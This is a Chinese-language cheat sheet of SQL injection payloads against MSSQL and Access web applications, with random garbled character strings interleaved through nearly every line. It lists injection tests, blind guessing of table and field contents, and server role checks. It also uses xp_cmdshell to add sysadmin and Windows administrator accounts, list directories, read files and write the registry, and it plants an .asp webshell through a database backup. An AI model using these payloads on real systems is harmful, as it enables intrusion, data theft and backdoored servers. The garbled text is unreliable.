1.判断是否有注入;and 1=1 ;and 1=2 �DHRlWQox�
2.初步判断是否是mssql ;and user>0 @O~pV`�_tD
�nJ��;.T�d
3.注入参数是字符'and [查询条件] and ''=' m4Zk\,1m.|
�-��nwyp�u
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �F"mm�L�ao
�lEBLZ�}}\
5.判断数据库系统 |uJ�%��5y#
�!()Qm,�1u
;and (select count(*) from sysobjects)>0 mssql ;9#Ke��A _
J .�<F"r>
;and (select count(*) from msysobjects)>0 access ��|�V(0G�B
�yt2PU_),�
6L�~n.5B~o
E�?@m�?@*/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Cvd��N"k��
: �rVnc =k
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �cz�$2���R
/mZE/>&~�,
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Zwx%7l;C��
!�5N.B|N�t
9.(1)猜字段的ascii值(access) St^5Byd<��
xyxy`�qR�A
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 y
B$x>Q'C(
�7|�H$ /]
(2)猜字段的ascii值(mssql) {.]7!I�Sl5
�!n%j)`0�M
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 nr3==21Om4
z@j8�lv2j1
10.测试权限结构(mssql) H,NF;QPPC�
�rT>�wg1:�
Alq(���QDs
@}Z��Vtr�z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �L�RF103nw
�*NQ/UX�E�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- OZ&o:/*H�M
GN>@ZdVG}#
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- H��"F29Pu2
�mp3s-YfRc
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |l!�a�B(NW
e�#q}F>/�L
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- P2nu;I_��&
�Yr|4Fl�~U
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �{c0`Um3&>
o �!7va�"�
;and 1=(select IS_MEMBER('db_owner'));-- <oeI�cN�7d
v-Sd*(���6
�6w7�7YTJ�
@j/&m]6%-D
11.添加mssql和系统的帐户 DaV�����a}
T^q�
�0'#/
;exec master.dbo.sp_addlogin username;-- �wKHBAW[i]
;exec master.dbo.sp_password null,username,password;-- fX���B0j;A
��Z6m)tZVM
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- B�J0?kX@��
y�+�q5U�C|
;exec master.dbo.xp_cmdshell 'net user username password ����#LC�b
L�gYq.>Nl9
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- [�00m/f�T6
,+ �~W4<f
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��I}Q2�Vu<
J=yT�bSN\v
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �3uMy]H�UQ
��D�Ts�;{c
}��~q5w{_n
']o�Q]Yx0�
12.(1)遍历目录 ��w*Ih�k�)
{>;R�?TG]$
;create table dirs(paths varchar(100), id int) L0]_X#�s>#
e�Q}4;^;M-
;insert dirs exec master.dbo.xp_dirtree 'c:\' <-0]i�_4sK
azU"G(6y?+
;and (select top 1 paths from dirs)>0 W�PDyu.QD
O
H7F�kR��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �.p$(ZH =~
K+iP��6B �
y> (�w\K9W
8>%hz$no=
(2)遍历目录 (�i�GTACoF
~{gqsuCCL
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- zMJT:�7*`|
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 B�1Oq���!k
�|'2d_��vR
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �B�O�RA�(,
��L�HmZxi?
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 .��8|X ��
�� C.QO#b�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ~�;]��d"'�
�mc��ok/,/
"I�TIhnE��
l�RdChoL$2
13.mssql中的存储过程 Ct�|A:/�z(
_a�MF?Pj~m
xp_regenumvalues 注册表根键, 子键 GJUL����$9
F�g�I3 ���
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ����l�+0P
?hM6�4jI�|
xp_regread 根键,子键,键值名 ��(I}�v�[W
�s�(8W_4&'
;exec xp_regread Qei�"�'~1a
{ "E\Jcjl\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 R���G�X=)�
"*�H`HRi4T
xp_regwrite 根键,子键, 值名, 值类型, 值 h7�I{��
4�
�E!AE4B1bd
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 c:g'.�'�/*
�8i,K~Bu�=
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 kN�L\m[W8$
0?M:6zf_iv
xp_regdeletevalue 根键,子键,值名 [8*�)8�jP3
]cruF�#`�%
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 3�BLq���CZ
G#1�GXFDO{
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ]���s�748+
]9,�;�K;1<
F�G�QzoS��
�v9U�D%@tZ
14.mssql的backup创建webshell #o2[h��ibq
Q5_o�/�w�k
use model o`�RKXfC�q
o?
$.fhD
�
create table cmd(str image); fxIf�|9Qi`
{z�FMmPi�d
insert into cmd(str) values (''); [fI�g{Q���
��7[wieYj{
backup database model to disk='c:\l.asp'; 3[f)�:
u3"
,v�&(Y�Od
��8J���D,u
<Ok3�F�E.K
15.mssql内置函数 o8vug�$=Z�
IqGdfL6[(�
;and (select @@version)>0 获得Windows的版本号 A��+)`ZTuO
�2Wb]�4��-
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �F��}q�c0�
a@�*�\o+Su
;and (select user_name())>0 爆当前系统的连接用户 �K_-MYs�.
j8�`��BdKg
;and (select db_name())>0 得到当前连接的数据库
�YrKWA���
+2j� AC� r
�$tS}LN_!
9&ids!W~yx
16.简洁的webshell !?�gKqx'T$
k���#�rBB�
use model `�~`k_7t�.
IaXe��Rq?<
create table cmd(str image); 6JQ'Ik;$wX
O�7IJ%_�A&
insert into cmd(str) values (''); 8&aq/4:q0�
k@:%:Sj �2
backup database model to disk='g:\wwwtest\l.asp';
